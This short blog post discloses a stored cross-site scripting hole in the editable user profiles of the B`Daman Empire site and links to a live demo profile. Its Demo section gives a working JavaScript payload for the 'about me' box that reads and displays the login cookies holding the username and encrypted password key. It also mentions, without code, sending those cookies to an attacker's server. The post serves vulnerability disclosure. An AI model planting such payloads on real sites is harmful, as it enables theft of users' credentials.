A new site design for the B`Daman Empire includes self editable profiles. This opens up the possibility for hacking user’s pages. So I checked it out. Can I successfully hack my own page? And also infiltrate the pages of others? The following is a proof of concept, and I do not endorse it’s use and it is only shown for educational information.
What Can We Do?
One of the scariest things we can do is get the username + password combination for logging in to B`Daman Empire. This is very scary and would allow someone to send these combos to a server for cracking. This is obviously a very scary idea. The following demos this sort of attack.
Demo
Make an account and go to the edit profile page. Once there put the following into the about me box:
<script type="text/javascript">function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } alert(readCookie("Key_Empire")); </script>
Then reload your profile and you will see your encrypted password key pop up. You can easily make your username pop up by replace Key_Empire with ID_Empire. You could easily furnish an AJAX call to send those keys to your server. This is a sever vunerability that must be fixed. For a demo of this go to my profile: http://testbdamanempire.phpnet.us/pubprofile.php?user=gsmaverick
